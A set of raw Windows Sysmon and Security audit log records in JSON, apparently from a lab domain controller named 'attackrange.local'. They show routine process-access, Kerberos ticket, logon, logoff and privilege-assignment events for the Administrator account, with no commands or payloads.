{"EventTime":"2020-08-01 06:55:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6144,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:23.651\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:23.651","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6145,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:23.651\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:23.651","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220652,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x909F1\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x909f1","LogonType":"3","EventReceivedTime":"2020-08-01 06:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6146,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:23.667\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:23.667","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220653,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220654,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{8A3D81DF-CFB0-81F8-C989-59580F7C5854}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{8A3D81DF-CFB0-81F8-C989-59580F7C5854}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220655,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{8A3D81DF-CFB0-81F8-C989-59580F7C5854}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{8A3D81DF-CFB0-81F8-C989-59580F7C5854}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220656,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x90A13\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{8A3D81DF-CFB0-81F8-C989-59580F7C5854}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x90a13","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{8A3D81DF-CFB0-81F8-C989-59580F7C5854}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220657,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x90A13\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x90a13","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6147,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:23.667\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:23.667","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
